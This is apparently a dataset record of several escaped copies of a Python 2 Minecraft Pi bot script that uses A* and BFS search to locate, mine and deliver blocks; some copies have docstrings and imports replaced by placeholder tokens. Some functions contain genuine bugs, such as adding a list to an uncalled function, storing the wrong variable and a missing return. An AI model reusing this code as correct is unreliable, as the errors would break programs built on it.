1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and \\\n abs(diff.x) + abs(diff.z) == 2 and \\\n state.get_block(self._player_loc + diff/2 + _Vec3(0, -1, 0)) not in \\\n (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n\n # If man == dy: return man + 1\n # If man > dy: return man\n # If man < dy: return dy?\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n\n if y_diff == 0:\n return man_dist\n\n # Transform so that it's only dropping\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n\n drops = _drops(y_diff, drop)\n\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n \n\ndef _drops(dist, drop):\n \"\"\"Return the number of times it takes to drop a distance dist. drop is the\n length of one drop. Both are assumed positive.\"\"\"\n rtn = dist / drop\n if dist % drop != 0:\n rtn += 1\n return rtn\n \n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = (bot.x, bot.z)\n\n y_diff = bot_pos.y - player_pos.y\n\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n@singleton\ndef _get_mc():\n \"\"\"Return the Minecraft instance.\"\"\"\n return minecraft.Minecraft.create()\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n\n", "<docstring token>\nfrom copy import deepcopy\nfrom time import sleep\nimport mcpi.minecraft as minecraft\nfrom mcpi.vec3 import Vec3\nimport mcpi.block as block\nfrom search import SearchProblem, astar, bfs\nfrom singleton import singleton\n_AIR = block.AIR.id\n_WATER = block.WATER.id\n_LAVA = block.LAVA.id\n_BEDROCK = block.BEDROCK.id\n_DROP = 2\n_DROP_PLUS_1 = _DROP + 1\n_DELAY = 1\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n if y_diff == 0:\n return man_dist\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n\n\ndef _drops(dist, drop):\n \"\"\"Return the number of times it takes to drop a distance dist. drop is the\n length of one drop. Both are assumed positive.\"\"\"\n rtn = dist / drop\n if dist % drop != 0:\n rtn += 1\n return rtn\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot.x, bot.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n@singleton\ndef _get_mc():\n \"\"\"Return the Minecraft instance.\"\"\"\n return minecraft.Minecraft.create()\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n_AIR = block.AIR.id\n_WATER = block.WATER.id\n_LAVA = block.LAVA.id\n_BEDROCK = block.BEDROCK.id\n_DROP = 2\n_DROP_PLUS_1 = _DROP + 1\n_DELAY = 1\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == 